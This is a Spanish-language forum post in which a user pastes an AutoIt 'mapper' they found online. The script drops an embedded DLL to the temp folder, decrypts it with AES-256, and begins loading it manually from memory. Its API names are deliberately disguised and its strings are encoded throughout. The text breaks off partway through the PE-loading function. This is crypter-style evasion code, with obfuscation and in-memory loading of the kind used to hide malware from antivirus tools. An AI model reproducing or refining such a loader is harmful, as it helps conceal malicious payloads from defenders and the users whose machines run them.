• Autoit

 #493180  por SanGetsu18
 04 Ene 2018, 17:32
Estuve buscando información al respecto y me encontré un mapper simplón por la red es este:
#NoTrayIcon  
#include <WinAPI.au3>
#include <Memory.au3>
#include <Crypt.au3>

$ROOTKERNELADMINISTRATIONROOT=BINDLL
$ROOTADMINISTRATIONROOTEXPLOITKERNEL=_CRYPT_STARTUP
$BYPASSKERNELEXPLOITEXPLOITBYPASS=BINARYTOSTRING
$EXPLOITEXPLOITBYPASSHOOK=_CRYPT_DECRYPTDATA
$KERNELKERNELADMINISTRATIONROOTHOOK=DLLFROMMEMORY
$ADMINISTRATIONBYPASSROOTKERNELBYPASSEXPLOIT=DLLCLOSE
$KERNELROOTEXPLOITEXPLOITADMINISTRATION=FILEOPEN
$EXPLOITADMINISTRATIONBYPASSHOOK=FILEREAD
$ADMINISTRATIONADMINISTRATIONEXPLOITKERNEL=FILECLOSE
$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION=DLLSTRUCTCREATE
$ROOTADMINISTRATIONHOOKKERNELBYPASSEXPLOIT=BINARYLEN
$ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION=DLLSTRUCTSETDATA
$HOOKROOTKERNELROOTHOOK=DLLSTRUCTGETPTR
$BYPASSEXPLOITHOOKEXPLOIT=DLLSTRUCTCREATE
$KERNELBYPASSROOTADMINISTRATION=DLLSTRUCTGETDATA
$HOOKHOOKADMINISTRATIONHOOK=DLLSTRUCTGETDATA
$ROOTKERNELHOOKHOOKBYPASSROOT=SETERROR
$ADMINISTRATIONADMINISTRATIONADMINISTRATIONROOTEXPLOIT=DLLSTRUCTCREATE
$HOOKBYPASSADMINISTRATIONHOOKKERNEL=DLLSTRUCTGETDATA
$HOOKROOTBYPASSROOTROOTADMINISTRATION=SETERROR
$ADMINISTRATIONROOTEXPLOITHOOKROOTBYPASS=DLLSTRUCTCREATE
$HOOKHOOKROOTKERNEL=DLLSTRUCTGETDATA
$ADMINISTRATIONBYPASSROOTEXPLOIT=DLLSTRUCTCREATE
$EXPLOITADMINISTRATIONROOTADMINISTRATIONKERNEL=DLLSTRUCTGETDATA
$KERNELADMINISTRATIONADMINISTRATIONHOOK=SETERROR
$HOOKROOTKERNELROOT=DLLSTRUCTCREATE
$ROOTROOTBYPASSROOT=SETERROR
$KERNELKERNELKERNELROOTBYPASS=DLLSTRUCTCREATE
$ROOTADMINISTRATIONEXPLOITBYPASSKERNELHOOK=SETERROR
$EXPLOITADMINISTRATIONHOOKBYPASS=DLLSTRUCTGETDATA
$EXPLOITHOOKEXPLOITKERNELADMINISTRATIONROOT=DLLSTRUCTGETDATA
$KERNELROOTBYPASSKERNEL=DLLSTRUCTGETDATA
$EXPLOITROOTBYPASSADMINISTRATION=DLLSTRUCTCREATE
$ADMINISTRATIONBYPASSROOTROOTADMINISTRATIONADMINISTRATION=DLLSTRUCTGETDATA
$BYPASSBYPASSKERNELEXPLOITADMINISTRATION=DLLSTRUCTGETDATA
$EXPLOITHOOKEXPLOITROOTHOOK=DLLSTRUCTCREATE
$EXPLOITROOTKERNELADMINISTRATIONROOTHOOK=DLLSTRUCTGETDATA
$ROOTROOTBYPASSADMINISTRATION=DLLSTRUCTGETDATA
$HOOKEXPLOITKERNELBYPASSROOTEXPLOIT=UNMAPVIEWOFSECTION
$BYPASSKERNELROOTADMINISTRATION=_MEMVIRTUALALLOC
$BYPASSEXPLOITROOTKERNEL=DLLSTRUCTGETPTR
$HOOKROOTADMINISTRATIONEXPLOITHOOK=DLLSTRUCTGETDATA
$BYPASSADMINISTRATIONEXPLOITBYPASS=VIRTUALPROTECT
$KERNELROOTROOTKERNELKERNEL=_WINAPI_FREELIBRARY
$HOOKHOOKBYPASSKERNELHOOKROOT=SETERROR
$ROOTROOTEXPLOITBYPASS=DLLSTRUCTSETDATA
$HOOKHOOKEXPLOITROOTEXPLOITKERNEL=DLLSTRUCTCREATE
$HOOKADMINISTRATIONBYPASSEXPLOITKERNEL=DLLSTRUCTGETDATA
$BYPASSBYPASSADMINISTRATIONBYPASS=DLLSTRUCTCREATE
$HOOKROOTADMINISTRATIONHOOKKERNEL=DLLSTRUCTCREATE
$KERNELBYPASSEXPLOITBYPASS=DLLSTRUCTGETDATA
$EXPLOITROOTKERNELADMINISTRATIONHOOK=DLLSTRUCTGETDATA
$ADMINISTRATIONROOTADMINISTRATIONKERNEL=DLLSTRUCTGETDATA
$HOOKADMINISTRATIONEXPLOITBYPASSROOT=DLLSTRUCTGETDATA
$BYPASSADMINISTRATIONADMINISTRATIONADMINISTRATION=VIRTUALPROTECT
$BYPASSHOOKBYPASSBYPASSROOTKERNEL=DLLSTRUCTSETDATA
$HOOKEXPLOITKERNELBYPASSADMINISTRATION=DLLSTRUCTCREATE
$ADMINISTRATIONEXPLOITKERNELHOOKBYPASSBYPASS=DLLSTRUCTGETDATA
$BYPASSBYPASSHOOKHOOKKERNELADMINISTRATION=DLLSTRUCTCREATE
$HOOKHOOKADMINISTRATIONEXPLOITHOOK=DLLSTRUCTSETDATA
$BYPASSEXPLOITKERNELROOT=DLLSTRUCTCREATE
$BYPASSEXPLOITBYPASSROOTBYPASS=DLLSTRUCTGETDATA
$ROOTEXPLOITHOOKADMINISTRATIONBYPASSHOOK=DLLSTRUCTCREATE
$ADMINISTRATIONADMINISTRATIONKERNELADMINISTRATIONKERNELHOOK=DLLSTRUCTCREATE
$BYPASSKERNELEXPLOITKERNEL=FIXIMPORTS
$ADMINISTRATIONEXPLOITEXPLOITADMINISTRATIONHOOK=DLLSTRUCTCREATE
$ADMINISTRATIONKERNELBYPASSROOTROOTADMINISTRATION=FIXRELOC
$ADMINISTRATIONADMINISTRATIONBYPASSHOOK=DLLCALLADDRESS
$KERNELEXPLOITADMINISTRATIONROOTBYPASSADMINISTRATION=_WINAPI_FREELIBRARY
$KERNELROOTKERNELHOOKKERNELROOT=DLLSTRUCTGETSIZE
$ROOTADMINISTRATIONROOTBYPASSEXPLOIT=DLLSTRUCTGETPTR
$EXPLOITKERNELBYPASSKERNELHOOK=DLLSTRUCTCREATE
$ADMINISTRATIONKERNELBYPASSKERNEL=DLLSTRUCTGETDATA
$KERNELADMINISTRATIONEXPLOITROOTEXPLOITADMINISTRATION=DLLSTRUCTGETDATA
$EXPLOITHOOKKERNELADMINISTRATIONEXPLOITADMINISTRATION=DLLSTRUCTCREATE
$EXPLOITROOTROOTADMINISTRATIONEXPLOIT=DLLSTRUCTGETPTR
$ADMINISTRATIONHOOKROOTROOT=DLLSTRUCTGETDATA
$ROOTBYPASSADMINISTRATIONADMINISTRATION=BITSHIFT
$EXPLOITEXPLOITKERNELROOTHOOK=DLLSTRUCTCREATE
$BYPASSBYPASSHOOKEXPLOIT=BITAND
$KERNELEXPLOITHOOKEXPLOITADMINISTRATIONHOOK=DLLSTRUCTSETDATA
$BYPASSHOOKHOOKROOTADMINISTRATIONROOT=DLLSTRUCTGETDATA
$EXPLOITBYPASSADMINISTRATIONROOTADMINISTRATIONEXPLOIT=DLLSTRUCTGETPTR
$BYPASSBYPASSEXPLOITBYPASS=DLLSTRUCTGETSIZE
$BYPASSBYPASSADMINISTRATIONKERNELKERNEL=DLLSTRUCTCREATE
$HOOKEXPLOITHOOKBYPASSKERNEL=DLLSTRUCTCREATE
$HOOKHOOKBYPASSROOTKERNEL=DLLSTRUCTGETDATA
$ROOTEXPLOITKERNELEXPLOIT=DLLSTRUCTGETDATA
$KERNELHOOKROOTBYPASSADMINISTRATION=DLLSTRUCTCREATE
$ROOTKERNELROOTROOTADMINISTRATIONBYPASS=_WINAPI_STRINGLENA
$BYPASSKERNELKERNELBYPASSHOOKADMINISTRATION=DLLSTRUCTGETDATA
$BYPASSEXPLOITEXPLOITROOTEXPLOITBYPASS=_WINAPI_LOADLIBRARY
$KERNELHOOKHOOKADMINISTRATION=DLLSTRUCTGETDATA
$ADMINISTRATIONKERNELBYPASSROOTADMINISTRATIONEXPLOIT=DLLSTRUCTGETDATA
$ROOTKERNELEXPLOITHOOKROOT=DLLSTRUCTGETDATA
$HOOKKERNELHOOKHOOKEXPLOIT=DLLSTRUCTCREATE
$KERNELBYPASSBYPASSHOOKROOT=DLLSTRUCTGETDATA
$HOOKKERNELROOTKERNELEXPLOIT=BITSHIFT
$KERNELEXPLOITADMINISTRATIONROOTROOT=BINARYMID
$BYPASSHOOKADMINISTRATIONHOOKBYPASSKERNEL=GETPROCADDRESS
$KERNELKERNELKERNELROOTHOOKEXPLOIT=BITAND
$EXPLOITADMINISTRATIONADMINISTRATIONADMINISTRATION=DLLSTRUCTCREATE
$ADMINISTRATIONADMINISTRATIONROOTEXPLOIT=_WINAPI_STRINGLENA
$KERNELADMINISTRATIONEXPLOITKERNEL=DLLSTRUCTGETDATA
$BYPASSBYPASSADMINISTRATIONADMINISTRATION=GETPROCADDRESS
$HOOKBYPASSHOOKBYPASSBYPASS=DLLSTRUCTSETDATA
$KERNELHOOKKERNELHOOK=DLLSTRUCTCREATE
$ADMINISTRATIONROOTEXPLOITHOOKADMINISTRATIONHOOK=DLLCALL
$BYPASSHOOKHOOKHOOKKERNELHOOK=_WINAPI_GETCURRENTPROCESS
$EXPLOITROOTROOTBYPASSKERNELHOOK=SETERROR
$HOOKEXPLOITEXPLOITEXPLOITKERNELKERNEL=DLLCALL
$EXPLOITADMINISTRATIONBYPASSROOT=SETERROR
$EXPLOITEXPLOITKERNELHOOKKERNELBYPASS=ISNUMBER
$BYPASSKERNELBYPASSBYPASS=DLLCALL
$ADMINISTRATIONROOTEXPLOITBYPASSROOTKERNEL=SETERROR

FILEINSTALL("HelloWorld.dll",@TEMPDIR&"/HelloWorld.dll",1)
$FILE=$ROOTKERNELADMINISTRATIONROOT(@TEMPDIR&"/HelloWorld.dll")
$ROOTADMINISTRATIONROOTEXPLOITKERNEL()
$TEMP_DECRYPTED=$BYPASSKERNELEXPLOITEXPLOITBYPASS($EXPLOITEXPLOITBYPASSHOOK($FILE,STRINGDEC("usjrahxtezaapqoxpojhugijiagzyf","-15,-9,5,4,7,16,-9,4,3,-15,23,21,3,1,0,-10,-2,-1,7,14,-11,9,9,6,-1,19,13,-23,-23,14"),$CALG_AES_256))
GLOBAL $HDLL=$KERNELKERNELADMINISTRATIONROOTHOOK($TEMP_DECRYPTED)
$ADMINISTRATIONBYPASSROOTKERNELBYPASSEXPLOIT($HDLL)
FUNC BINDLL($SFILE)
LOCAL $HFILE=$KERNELROOTEXPLOITEXPLOITADMINISTRATION($SFILE,16)
LOCAL $BBINARY=$EXPLOITADMINISTRATIONBYPASSHOOK($HFILE)
$ADMINISTRATIONADMINISTRATIONEXPLOITKERNEL($HFILE)
RETURN $BBINARY
ENDFUNC
FUNC DLLFROMMEMORY($BBINARYIMAGE)
LOCAL $TBINARY=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ROOTADMINISTRATIONHOOKKERNELBYPASSEXPLOIT($BBINARYIMAGE)&"]")
$ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($TBINARY,1,$BBINARYIMAGE)
LOCAL $PPOINTER=$HOOKROOTKERNELROOTHOOK($TBINARY)
LOCAL $TIMAGE_DOS_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("cafcpiykeudtenowwkcwacdibognfe","0,7,-5,15,-80,-28,-24,-4,4,-18,-9,-66,-8,-51")&STRINGDEC("ubkwizcimjccdlngsyozqnmibctpmy","2,13,7,-19,-73,-56,22,11,-8,9,-20,11,-24,-11,5,13,-35,-24,-8,-21,-54")&STRINGDEC("jkmnqgfdegisgbolkjuviexnjchhmj","13,4,5,-10,-81,-23,-5,3,0,12,-46")&STRINGDEC("juwfbhmxssmocpwtpbcobugkqfdcsx","13,-6,-5,-2,-66,-22,-8,-12,-4,-16,-12,5,6,-1,-9,-1,-53")&STRINGDEC("ororjsbobfeuexuctebiilpjrlwbzr","8,-3,3,-14,-74,-32,7,11,3,9,1,-45,0,-23,-17,2,-2,-42")&STRINGDEC("yukurzknzqmfrnbgfeknadgrlcswyd","-2,-6,7,-17,-82,-45,-2,0,-17,-4,8,7,-45,10,18,11,-5,-42")&STRINGDEC("hcitseforjnbwwlesemwhzsnsofyji","15,12,9,-16,-83,-24,-5,9,-9,3,7,11,-50,1,8,13,-18,-42")&STRINGDEC("pcmexevhoapcnowlhnqvbmfdgzwdtb","7,12,5,-1,-88,-18,-35,-45")&STRINGDEC("nfvqivdzbivpwjjjsfyhgurvhktyga","9,9,-4,-13,-73,-35,-20,-63")&STRINGDEC("iqydohopzirvzgokzikhdtrfrtinsr","14,-2,-7,0,-79,-37,-7,-11,-23,2,1,-1,-13,-44")&STRINGDEC("bbhshyiatjhkveqyxbnxvwhjxektqt","21,13,10,-15,-72,-48,-25,-38")&STRINGDEC("woomgigoagyltoukvhgfvckhehksjr","0,0,3,-9,-71,-38,-20,-52")&STRINGDEC("knlkwzunftsaagncrdvuhpvaxdquzx","12,1,6,-7,-87,-40,-16,-2,9,-17,-18,19,8,8,0,-40")&STRINGDEC("wtdvwapqykauuhxanlidtihynoqjfc","0,-5,14,-18,-87,-18,6,-12,-7,1,0,4,-58")&STRINGDEC("jblctkcwzafjjioqysnjrwngwtnmrd","-7,6,-11,15,-84,-25,2,-4,-21,17,16,-5,-6,-14,-55,-20,-62")&STRINGDEC("wpaoqzttzejeftoafhonsuzlhxurjq","0,-1,17,-11,-81,-43,-47,-39,-49,-1,-5,9,14,-11,-9,8,-1,10,-52")&STRINGDEC("bpsytbsqlyrrlgxuaqcfzgtdtdaygh","21,-1,-1,-21,-84,-19,-46,-36,-35,-11,-12,-3,6,6,-23,-1,8,-2,11,-43")&STRINGDEC("ueqmamdbvlcyewgqnzlmsxoomyrhzj","-18,3,-16,5,-65,-27,1,17,-17,6,19,-20,-1,-69,-12,-63,-62,-29,-49")&STRINGDEC("ynlokakmzhypfrkhblsjjpqbrtbhzm","-21,9,3,3,-7,-65,-42,-9,-22,10,-20,3,13,-35,-5,-26,3,11,-46,14,-5,-40,-12,-1,-14,-15,16"),$PPOINTER)
$PPOINTER+=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DOS_HEADER,STRINGDEC("dxokaffwazvbipoiudpyjghgnmrmtj","-35,-20,-11,7,4,13,13,-40,5,-44,-17,21,-36,8,-10,-33,-16,-3,-12,-20,8"))
LOCAL $SMAGIC=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DOS_HEADER,STRINGDEC("rijddzsrdudkbminhfxzclaedyujxh","-37,-8,-3,5,-1"))
IF NOT ($SMAGIC=="MZ")THEN
RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(1,0,0)
ENDIF
LOCAL $TIMAGE_NT_SIGNATURE=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("vvxgrorfaveuzywnnofucsdksnzxpi","-18,1,-9,11,-14,-79,-31,3,6,-8,-4,-1,-5,-7,-18"),$PPOINTER)
$PPOINTER+=4
IF $KERNELBYPASSROOTADMINISTRATION($TIMAGE_NT_SIGNATURE,STRINGDEC("hfvlslrfzlxtfvheabssvtkdrwjdvd","-21,3,-15,2,-18,8,3,12,-21"))<>17744 THEN
RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(2,0,0)
ENDIF
LOCAL $TIMAGE_FILE_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("retwkmufmhmqqqdufngfgdcsnpuhur","5,10,-2,-19,-75,-32,-20,-3,-5,1,1,-12,-54")&STRINGDEC("jkyhbzkqgtbnrbyvhdlfukgrzrptzq","13,4,-7,-4,-66,-44,10,-4,-5,-15,16,-31,-12,-15,-20,-19,12,5,3,8,-2,-48")&STRINGDEC("fgdaygtgtzkeiogftjplkmhulfitfm","-2,16,11,17,-21,-71,-32,2,-7,-21,-39,-4,11,-10,-20,14,-19,3,0,-49")&STRINGDEC("zopsbydhesjliykcpzsrvtfauhflxz","-22,8,-1,-1,2,-89,-20,7,4,-5,10,-7,9,-37,4,-16,9,-13,-17,-3,-10,-32,-5,1,-9,-3,-43")&STRINGDEC("flefcfumutnglnuaesxlfacuwsbvwu","-2,11,10,12,1,-70,-39,8,-8,-18,-9,11,-29,-8,-34,24,8,-17,-9,0,13,-38")&STRINGDEC("sirkouutovjrulplwkbwilyyfdsrvn","4,6,0,-7,-79,-34,-12,6,-10,-39,-4,-35,-5,8,-7,3,-9,-10,10,-47,-4,-11,-21,-20,12,-41")&STRINGDEC("bbvlnjrojihsqathczonmpdpebdxvt","21,13,-4,-8,-78,-39,-10,-14,8,-8,-5,1,-12,17,-11,11,17,-17,-12,5"),$PPOINTER)
LOCAL $INUMBEROFSECTIONS=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_FILE_HEADER,STRINGDEC("gqpiikbiiqmkisxanzdkqymhrqxvgn","-25,4,-3,-7,-4,7,-19,-3,-22,-12,-10,9,0,-4,-10,18"))
$PPOINTER+=20
LOCAL $TMAGIC=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ltdxfwynlbjsvdanyihkuqwdrviztg","11,-5,14,-20,-70,-42,-24,-7,-3,1,-47"),$PPOINTER)
LOCAL $IMAGIC=$KERNELBYPASSROOTADMINISTRATION($TMAGIC,1)
LOCAL $TIMAGE_OPTIONAL_HEADER
IF $IMAGIC=267 THEN
IF @AUTOITX64 THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(3,0,0)
$TIMAGE_OPTIONAL_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ltdxfwynlbjsvdanyihkuqwdrviztg","11,-5,14,-20,-70,-42,-24,-7,-3,1,-47")&STRINGDEC("phtmbpkyvjtldmaevyoqfpsajvfkyr","-14,17,0,-8,-66,-35,-10,-15,-7,8,-40,-3,10,-2,4,13,-32,-20,3,2,3,-1,-5,-38")&STRINGDEC("pfrvamtwlzvahdajmnfnixukxqvjcn","-14,19,2,-17,-65,-32,-11,-9,3,-8,-42,8,6,7,4,8,-23,-9,12,5,0,-9,-7,-48")&STRINGDEC("zznqemumdcjfgbjqcxcfzdkzjgzraf","-22,-3,1,1,-1,-77,-34,-4,22,2,-27,0,-36,13,-6,-12,-40")&STRINGDEC("tgdxlnriionmhcmirelnaeboiclffe","-16,16,11,-6,-8,-78,-31,0,17,-10,-31,-7,-31,11,-4,11,-9,-4,0,-5,25,0,2,-43,-8,17,-11,-43")&STRINGDEC("anejkuipptdxyzpklmpuxkhkxqwuub","3,9,10,8,-7,-85,-22,-7,10,-15,-21,-18,-36,-12,-7,3,-3,7,-7,-20,-12,-2,18,-6,-20,-45,-22,-1,-20,-39")&STRINGDEC("cyotrfodsvhtzmzgavlxjcmpzjmpnq","1,-2,0,-2,-14,-70,-46,0,-15,-4,-3,-1,-7,-30,-20,-34,13,-2,6,1,-26,12,-4,-2,-6,-47")&STRINGDEC("ieqdjchuvhvquaxaaxfeicstnprmjy","-5,18,-2,14,-6,-67,-38,-20,-3,-3,-39,-11,-50,14,-20,4,-38")&STRINGDEC("rmoxhaieftsimilitgwvknhwnxxixz","-14,10,0,-6,-4,-65,-39,-4,13,-15,-36,-3,-41,-8,8,-8,-57")&STRINGDEC("ehjyoiekhvhjqdhnshxigdwplgzdbw","-1,15,5,-7,-11,-73,-28,2,-7,-15,-3,-40,-16,15,-3,-51")&STRINGDEC("exminvanugqcpyvxhdxhfyewdnjudn","-1,-1,2,9,-10,-86,-14,-9,-18,13,-8,12,-2,-56,-10,-15,-1,10,-11,-3,8,-5,-42")&STRINGDEC("ikovgnghvtwulshxaacxinhwmhwwhi","-5,12,0,-4,-3,-78,-33,1,-10,-15,-54,-9,-3,-12,6,-11,4,13,17,-61")&STRINGDEC("pkeodrwintgxsleputwcfakyqdjigk","7,4,13,-11,-68,-37,-22,1,1,-2,-24,-8,-14,6,-4,4,-12,-6,-16,-16,19,18,9,-20,-4,-14,-5,9,12,-2,-1,3,-42")&STRINGDEC("rsgizxjiqxfvzvpjysgpvumwnmxvgg","5,-4,11,-5,-90,-43,-1,5,-2,-6,-23,-6,-21,-4,-15,10,-16,-5,0,-29,3,-2,7,-18,-1,-23,-19,-4,12,2,-3,-5,-44")&STRINGDEC("ijyobiktanvrjgmgdsyofhppgikybt","14,5,-7,-11,-66,-28,-10,-10,14,4,-45,-5,-9,0,-8,-17,1,-1,-6,-6,9,6,-53")&STRINGDEC("whlayssemmndzorobazycfqwpgbnpx","0,7,6,3,-89,-38,-10,9,2,5,-37,9,-25,-8,-13,-25,3,17,-7,-16,12,8,-54")&STRINGDEC("uldpgdgovwxumqmmaaqgqyrwsdainm","2,3,14,-12,-71,-23,-6,-5,-7,-5,-37,0,-11,2,12,6,19,4,-4,-17,-12,-7,1,-14,-4,10,-38")&STRINGDEC("hfnduqnrlbroybqslnaqoogukwuauv","15,9,4,0,-85,-36,-5,-4,3,16,-31,6,-23,17,8,0,8,-9,12,-27,-10,3,12,-12,4,-9,-58")&STRINGDEC("nqpaymclyzlckbvmscnwxywpjhkamg","-10,6,-1,17,-21,-77,-12,-3,-11,-71,-58,-13,-6,16,-3,-4,-4,11,-24,-22,-12,-4,-18,-53")&STRINGDEC("faxgbzxuuvjkpasfhvbxxknkonfdel","-2,22,-9,11,2,-90,-37,-12,5,-17,-27,-5,-39,12,-18,1,-3,-59")&STRINGDEC("gnobcrxmwoyuussmjbbpxzefcjmlve","-3,9,0,16,1,-82,-37,-4,3,-10,-42,-15,-45,-14,-18,-9,-5,16,17,-53")&STRINGDEC("ieyxrrajxyexgteibukaitgbzhpdkv","-5,18,-10,-6,-14,-82,-30,-2,-19,-22,6,-37,14,-7,-42")&STRINGDEC("cdjqrrkrxphgwfhemgenaxowhhhhmw","20,11,8,-13,-82,-31,10,-16,-5,9,11,13,-18,7,-45")&STRINGDEC("haihznoatxwzjhtxfddiskisnhgxyj","15,14,9,-4,-90,-42,-3,11,-49,-16,-22,-8,-9,-5,0,-19,12,5,15,11,-10,-8,10,-56")&STRINGDEC("hvwuctdpudbiwukfefxlukkajrxhml","-4,1,-8,-3,1,-84,-17,-7,5,1,-19,-3,-36,-1,-10,-3,6,-20,-19,7,-16,7,11,4,-47")&STRINGDEC("xpyocpucykwklmcgpnjfxxvgxrqzvn","-20,7,-10,3,1,-80,-34,6,1,-6,-40,-5,-25,7,-2,-4,-5,-43,5,7,-11,-15,-2,-44")&STRINGDEC("itqjjtiqkyprnswzkdzxizyyvyflwz","-5,3,-2,8,-6,-84,-22,-8,15,-20,-33,-12,-38,-14,-22,-10,-25,1,-7,-19,9,-4,-20,-62")&STRINGDEC("wcpvnygzkdwoiefiynhkyiymolexfb","-19,20,-1,-4,-10,-89,-20,-17,15,1,-40,-9,-33,0,-5,7,-54,1,5,2,-16,11,-62")&STRINGDEC("sxefhvsraekvuxabluizrsvvnrtxgg","-15,-1,10,12,-4,-86,-39,-3,0,-1,-6,-4,-47,-12,0,5,7,-58")&STRINGDEC("otffztxddrgbujlpiyxifduzuypdjq","-11,3,9,12,-22,-84,-42,17,9,-16,-2,16,-38,-4,-26,6,-8,-56,-10,-5,-19,5,5,-21,-2"),$PPOINTER)
$PPOINTER+=96
ELSEIF $IMAGIC=523 THEN
IF NOT @AUTOITX64 THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(3,0,0)
$TIMAGE_OPTIONAL_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ltdxfwynlbjsvdanyihkuqwdrviztg","11,-5,14,-20,-70,-42,-24,-7,-3,1,-47")&STRINGDEC("phtmbpkyvjtldmaevyoqfpsajvfkyr","-14,17,0,-8,-66,-35,-10,-15,-7,8,-40,-3,10,-2,4,13,-32,-20,3,2,3,-1,-5,-38")&STRINGDEC("pfrvamtwlzvahdajmnfnixukxqvjcn","-14,19,2,-17,-65,-32,-11,-9,3,-8,-42,8,6,7,4,8,-23,-9,12,5,0,-9,-7,-48")&STRINGDEC("zznqemumdcjfgbjqcxcfzdkzjgzraf","-22,-3,1,1,-1,-77,-34,-4,22,2,-27,0,-36,13,-6,-12,-40")&STRINGDEC("tgdxlnriionmhcmirelnaeboiclffe","-16,16,11,-6,-8,-78,-31,0,17,-10,-31,-7,-31,11,-4,11,-9,-4,0,-5,25,0,2,-43,-8,17,-11,-43")&STRINGDEC("anejkuipptdxyzpklmpuxkhkxqwuub","3,9,10,8,-7,-85,-22,-7,10,-15,-21,-18,-36,-12,-7,3,-3,7,-7,-20,-12,-2,18,-6,-20,-45,-22,-1,-20,-39")&STRINGDEC("cyotrfodsvhtzmzgavlxjcmpzjmpnq","1,-2,0,-2,-14,-70,-46,0,-15,-4,-3,-1,-7,-30,-20,-34,13,-2,6,1,-26,12,-4,-2,-6,-47")&STRINGDEC("ieqdjchuvhvquaxaaxfeicstnprmjy","-5,18,-2,14,-6,-67,-38,-20,-3,-3,-39,-11,-50,14,-20,4,-38")&STRINGDEC("lrbrvkwljjlvqewtjweaygvboxavrf","9,-9,12,2,-64,-55,-87,-35,3,-9,-5,-17,-47,-4,-4,-15,-47")&STRINGDEC("exminvanugqcpyvxhdxhfyewdnjudn","-1,-1,2,9,-10,-86,-14,-9,-18,13,-8,12,-2,-56,-10,-15,-1,10,-11,-3,8,-5,-42")&STRINGDEC("ikovgnghvtwulshxaacxinhwmhwwhi","-5,12,0,-4,-3,-78,-33,1,-10,-15,-54,-9,-3,-12,6,-11,4,13,17,-61")&STRINGDEC("pkeodrwintgxsleputwcfakyqdjigk","7,4,13,-11,-68,-37,-22,1,1,-2,-24,-8,-14,6,-4,4,-12,-6,-16,-16,19,18,9,-20,-4,-14,-5,9,12,-2,-1,3,-42")&STRINGDEC("rsgizxjiqxfvzvpjysgpvumwnmxvgg","5,-4,11,-5,-90,-43,-1,5,-2,-6,-23,-6,-21,-4,-15,10,-16,-5,0,-29,3,-2,7,-18,-1,-23,-19,-4,12,2,-3,-5,-44")&STRINGDEC("ijyobiktanvrjgmgdsyofhppgikybt","14,5,-7,-11,-66,-28,-10,-10,14,4,-45,-5,-9,0,-8,-17,1,-1,-6,-6,9,6,-53")&STRINGDEC("whlayssemmndzorobazycfqwpgbnpx","0,7,6,3,-89,-38,-10,9,2,5,-37,9,-25,-8,-13,-25,3,17,-7,-16,12,8,-54")&STRINGDEC("uldpgdgovwxumqmmaaqgqyrwsdainm","2,3,14,-12,-71,-23,-6,-5,-7,-5,-37,0,-11,2,12,6,19,4,-4,-17,-12,-7,1,-14,-4,10,-38")&STRINGDEC("hfnduqnrlbroybqslnaqoogukwuauv","15,9,4,0,-85,-36,-5,-4,3,16,-31,6,-23,17,8,0,8,-9,12,-27,-10,3,12,-12,4,-9,-58")&STRINGDEC("nqpaymclyzlckbvmscnwxywpjhkamg","-10,6,-1,17,-21,-77,-12,-3,-11,-71,-58,-13,-6,16,-3,-4,-4,11,-24,-22,-12,-4,-18,-53")&STRINGDEC("faxgbzxuuvjkpasfhvbxxknkonfdel","-2,22,-9,11,2,-90,-37,-12,5,-17,-27,-5,-39,12,-18,1,-3,-59")&STRINGDEC("gnobcrxmwoyuussmjbbpxzefcjmlve","-3,9,0,16,1,-82,-37,-4,3,-10,-42,-15,-45,-14,-18,-9,-5,16,17,-53")&STRINGDEC("ieyxrrajxyexgteibukaitgbzhpdkv","-5,18,-10,-6,-14,-82,-30,-2,-19,-22,6,-37,14,-7,-42")&STRINGDEC("cdjqrrkrxphgwfhemgenaxowhhhhmw","20,11,8,-13,-82,-31,10,-16,-5,9,11,13,-18,7,-45")&STRINGDEC("haihznoatxwzjhtxfddiskisnhgxyj","15,14,9,-4,-90,-42,-3,11,-49,-16,-22,-8,-9,-5,0,-19,12,5,15,11,-10,-8,10,-56")&STRINGDEC("fxdtghgofffvfipskrarjwglsumils","15,-15,10,0,-49,-52,-71,-28,3,20,-1,-39,0,-22,4,-18,-8,-7,-15,-13,9,-18,11,10,-14,-58")&STRINGDEC("vtrecaeijykmcbhuwuatuvngilhwbv","-1,-11,-4,15,-45,-45,-69,-22,-1,1,-6,-30,3,-15,12,-20,-20,-10,-30,-5,-8,-9,-5,13,-46")&STRINGDEC("iaovcgmbsqfyywjjupuzspzasjjwmm","12,8,-1,-2,-45,-51,-77,-15,-10,9,-1,-42,-19,-47,-5,-9,-5,-30,-16,-7,-14,2,-4,4,-56")&STRINGDEC("zldnfbilropcisfeguxfrysgszpxxg","-5,-3,10,6,-48,-46,-73,-25,-9,11,-11,-20,-3,-43,-1,-4,9,-50,-9,7,-5,-16,1,-44")&STRINGDEC("sxefhvsraekvuxabluizrsvvnrtxgg","-15,-1,10,12,-4,-86,-39,-3,0,-1,-6,-4,-47,-12,0,5,7,-58")&STRINGDEC("otffztxddrgbujlpiyxifduzuypdjq","-11,3,9,12,-22,-84,-42,17,9,-16,-2,16,-38,-4,-26,6,-8,-56,-10,-5,-19,5,5,-21,-2"),$PPOINTER)
$PPOINTER+=112
ELSE
RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(3,0,0)
ENDIF
LOCAL $ISIZEOFIMAGE=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_OPTIONAL_HEADER,STRINGDEC("zsegnrzltluwowczdwtnhmfmrwgesz","-39,-10,21,-2,-31,-12,-49,1,-19,-5,-16"))
LOCAL $IENTRYPOINT=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_OPTIONAL_HEADER,STRINGDEC("ecaylgmvcgunqzdwlwowleyvvmqubq","-36,1,3,-7,-7,12,6,-39,3,-34,-7,6,1,-1,-20,-8,-3,-9,5"))
